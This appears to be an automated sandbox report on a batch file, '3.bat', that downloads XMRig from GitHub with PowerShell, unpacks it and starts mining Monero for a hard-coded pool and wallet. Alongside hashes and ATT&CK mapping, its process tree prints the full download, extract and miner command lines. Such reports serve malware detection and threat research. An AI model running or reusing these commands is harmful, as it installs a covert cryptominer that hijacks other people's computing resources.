Resubmissions

Analysis

  • max time kernel
    316s
  • max time network
    1799s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    20-05-2024 20:53

General

  • Target

    3.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • XMRig Miner payload 2 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1580
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4712
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
      xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:3332

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    56efdb5a0f10b5eece165de4f8c9d799

    SHA1

    fa5de7ca343b018c3bfeab692545eb544c244e16

    SHA256

    6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

    SHA512

    91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    e8698cc44a8db77ff2556d10a92de299

    SHA1

    03e5856e7d2962114cd6c64c266bb7d47d524d8c

    SHA256

    49f562e3f7e47b38b444c8222b9d4d6eaeef2d88dccbb175c973453b2015a5f2

    SHA512

    e55531b3b006fe2c95284fcb1812c4f69a27c42d934abbaad4cc5afb65daea8941b9f34b1648ebb0bd4dc18723786531913300abc34c5211384ae896bb285d01

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vptbq0hu.4wa.ps1
    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3-msvc-win64.zip
    Filesize

    2.5MB

    MD5

    cef0ae1ab544e40b659261a4e07fe48f

    SHA1

    e5ff855ce3c7726a50eb50a634ff9f406b3df093

    SHA256

    713263085499ae626a6148fab67932c9a69611b21ac3d04cf52a5e23495f902e

    SHA512

    1fb23b385e6cff3653f0b4b397d092c7be4df62899c97e18f675df2024e5f06ef2596fb626b85ae2ef7d7583c5bf54b00dba1a5ad566c2707a669a48d9814ba8

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
    Filesize

    6.1MB

    MD5

    c0f8959614ae06561216158d78a787e5

    SHA1

    73167d1fd0cee1c96a6505606d21cbfe4369eb00

    SHA256

    e199d88569fb54346d5fa20ee7b59b2ea6f16f4ecca3ea1e1c937b11aab7b2b0

    SHA512

    a24fcf344d08c64ac301d5e4979f062b5e28e8e4acf1d2790916149ffe7726b0c4a11e0775aeba6b841d2d5081e1bd13e2b80390bf9bfbc44d67e54ec07cd746

  • memory/3332-117-0x000001A6B2C20000-0x000001A6B2C40000-memory.dmp
    Filesize

    128KB

  • memory/4348-3-0x00007FFDB61E3000-0x00007FFDB61E4000-memory.dmp
    Filesize

    4KB

  • memory/4348-9-0x00000195F3B80000-0x00000195F3BF6000-memory.dmp
    Filesize

    472KB

  • memory/4348-25-0x00007FFDB61E0000-0x00007FFDB6BCC000-memory.dmp
    Filesize

    9.9MB

  • memory/4348-30-0x00007FFDB61E0000-0x00007FFDB6BCC000-memory.dmp
    Filesize

    9.9MB

  • memory/4348-6-0x00007FFDB61E0000-0x00007FFDB6BCC000-memory.dmp
    Filesize

    9.9MB

  • memory/4348-5-0x00000195DB840000-0x00000195DB862000-memory.dmp
    Filesize

    136KB

  • memory/4348-10-0x00007FFDB61E0000-0x00007FFDB6BCC000-memory.dmp
    Filesize

    9.9MB

  • memory/4712-41-0x00007FFDB61E0000-0x00007FFDB6BCC000-memory.dmp
    Filesize

    9.9MB

  • memory/4712-76-0x0000027C99A20000-0x0000027C99A32000-memory.dmp
    Filesize

    72KB

  • memory/4712-63-0x00007FFDB61E0000-0x00007FFDB6BCC000-memory.dmp
    Filesize

    9.9MB

  • memory/4712-89-0x0000027C998B0000-0x0000027C998BA000-memory.dmp
    Filesize

    40KB

  • memory/4712-113-0x00007FFDB61E0000-0x00007FFDB6BCC000-memory.dmp
    Filesize

    9.9MB

  • memory/4712-40-0x00007FFDB61E0000-0x00007FFDB6BCC000-memory.dmp
    Filesize

    9.9MB

  • memory/4712-37-0x00007FFDB61E0000-0x00007FFDB6BCC000-memory.dmp
    Filesize

    9.9MB